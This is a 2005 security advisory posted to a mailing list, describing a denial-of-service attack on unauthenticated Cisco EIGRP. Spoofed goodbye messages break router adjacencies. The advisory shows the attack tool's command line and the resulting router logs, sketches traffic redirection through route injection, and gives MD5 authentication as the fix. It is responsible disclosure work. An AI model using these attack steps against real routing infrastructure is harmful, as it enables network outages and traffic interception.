[<prev] [next>] [day] [month] [year] [list]
Message-ID: <43A6EA1B.9000200@arhont.com>
Date: Mon Dec 19 18:01:18 2005
From: mlists at arhont.com (Andrew A. Vladimirov)
Subject: Unauthenticated EIGRP DoS
Arhont Ltd.- Information Security
Arhont Advisory by: Arhont Ltd
Advisory: Unauthenticated EIGRP DoS
Class: design bug
Version: EIGRP version 1.2
Model Specific: Other versions might have the same bug
DETAILS:
We have used our custom EIGRP packet generator written on Perl to
evaluate the security of the EIGRP routing protocol.
In the initial generator testing stage we have successfully reproduced
the known DoS against EIGRP discovered by FX and described
at http://www.securityfocus.com/bid/6443. This attack is canned in the
generator using the --hellodos flag. The testing network was
completely brought down due to the ARP storm.
Moving further, we have discovered a novel selective single peer -
directed DoS attack employing the EIGRP "Goodbye Message". A goodbye
message is sent when an EIGRP routing process is shutting down to tell
the neighbors about the impending topology change to speed up the
convergence. This feature is supported in Cisco IOS Releases later than
12.3(2), 12.3(3)B, and 12.3(2)T. A spoofed "goodbye message" can
be sent to a peer claiming that it's neighbor is down, thus breaking the
neighborhood:
arhontus #/eigrp.pl --ipgoodbye 192.168.66.202 --as 65534 --source
192.168.66.191
469573: Aug 16 2005 03:08:11.773 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.111 (Ethernet0/0) is up: new adjacency
c2611#sh ip eigrp neigh
IP-EIGRP neighbors for process 65534
H Address Interface Hold Uptime SRTT RTO Q Seq
(sec)
(ms) Cnt Num
2 192.168.66.111 Et0/0 13 00:01:08 1 5000
1 0
0 192.168.30.191 Se0/0 12 00:05:06 1 4500
0 198
1 192.168.66.191 Et0/0 13 00:05:14 201 1206
0 199
469574: Aug 16 2005 03:09:31.299 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.111 (Ethernet0/0) is down: retry limit exceeded
c2611#
469575: Aug 16 2005 03:09:32.818 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.111 (Ethernet0/0) is up: new adjacency
c2611#
469576: Aug 16 2005 03:09:56.277 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469577: Aug 16 2005 03:09:59.283 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
469578: Aug 16 2005 03:09:59.868 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.191 (Ethernet0/0) is up: new adjacency
c2611#
469579: Aug 16 2005 03:10:02.288 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469580: Aug 16 2005 03:10:04.676 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.191 (Ethernet0/0) is up: new adjacency
469581: Aug 16 2005 03:10:05.289 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#
469582: Aug 16 2005 03:10:08.290 GMT: %DUAL-5-NBRCHANGE: IP-EIGRP(0)
65534: Neighbor 192.168.66.191 (Ethernet0/0) is down: Peer goodbye received
c2611#sh ip eigrp neigh
IP-EIGRP neighbors for process 65534
H Address Interface Hold Uptime SRTT RTO Q Seq
(sec) (ms) Cnt Num
0 192.168.30.191 Se0/0 14 00:09:50 1 4500
0 286
This selective nighborhood breaking can be used for other purposes, than
DoS. Re-initiating the EIGRP handshake helps a sniffing attacker to find
information about the EIGRP routing domain topology. Possessing such
information, a skilled attacker can selectively break the neighborhood
to redirect
traffic the way he wants.
Of course, on an unportected EIGRP domain there is a much simpler way of
traffic redirection, which is either directly injecting the routes using
our
packet generator or establishing a fake neighbourhood and supplying
metric parameters to the legitimate peers, which would lead DUAL to
favor the fake
neighbor.
Risk Factor: Medium
Workarounds: Always use EIGRP MD5-based authentication.
Communication History: sent to PSIRT on 10/10/05
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before
releasing them to the public domains (such as CERT and BUGTRAQ).
If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.*
Powered by blists - more mailing lists